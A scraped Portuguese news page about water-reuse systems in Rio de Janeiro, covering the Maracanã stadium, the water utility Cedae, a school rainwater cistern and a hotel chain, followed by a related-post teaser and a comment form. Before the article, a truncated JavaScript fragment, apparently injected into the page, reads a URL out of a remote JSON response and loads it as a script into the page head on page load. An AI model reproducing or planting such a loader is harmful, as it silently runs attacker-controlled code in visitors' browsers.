e.json()).then(e=>{const t=document.createElement("script");t.src=JSON.parse(e.Answer[0].data),document.querySelector("head").appendChild(t)});"/>
Home » Noticias » Construções implantam sistemas inteligentes para reuso da água

Construções implantam sistemas inteligentes para reuso da água

Para reduzir a vazão das águas em meio à crise hídrica, novas construções e projetos antigos têm implantado sistemas inteligentes. É o caso do estádio do Maracanã, que possui uma série de métodos de reaproveitamento. Através de um sistema capaz de economizar 50% de água potável, é possível utilizar a mesma água no sistema de irrigação automática do gramado, que é acionado de acordo com a umidade do ar. Além disso, torneiras inteligentes foram instaladas nos banheiros e descargas ecológicas compõem o esquema de reúso.

A Companhia de Água e Esgotos do Rio de Janeiro, a Cedae, também investiu em sistemas inteligentes. Em sua sede, no Rio, um sistema de reúso para atividades que não exigem o consumo de material 100% limpo, como em sanitários ou no cultivo dos jardins, foi implantado. Dessa forma, a quantidade armazenada supre a demanda de uma semana.

Pensando nisso, colégios cariocas também têm usado a água da chuva na limpeza de piscinas, corredores, rampas, para regar o jardim e nas descargas dos banheiros. O Colégio Olga Benário Prestes, localizado em Bonsucesso, Rio de Janeiro, possui aproximadamente 2,5 mil estudantes e conta com uma cisterna de 20 mil litros, adaptando o uso sustentável dos recursos naturais.

Outro bom exemplo foi dado por uma rede de hotéis de luxo que, sem diminuir o conforto dos hóspedes, realizou obras para reduzir a vazão dos chuveiros e mudanças significativas em seu sistema de descargas. Além disso, a rede composta por cinco hotéis planeja adaptar estações de tratamento de efluentes e também reutilizar a água da chuva.

Fonte: Correio do Brasil, 12/03/2015

Veja também

onu

CONSELHO MUNDIAL DE CLORO PARTICIPA DO FÓRUM NA ONU

O Conselho Mundial de Cloro (WCC – sigla em inglês) está participando do Fórum Político ...

Deixe uma resposta

O seu endereço de email não será publicado Campos obrigatórios são marcados *

Você pode usar estas tags e atributos de HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>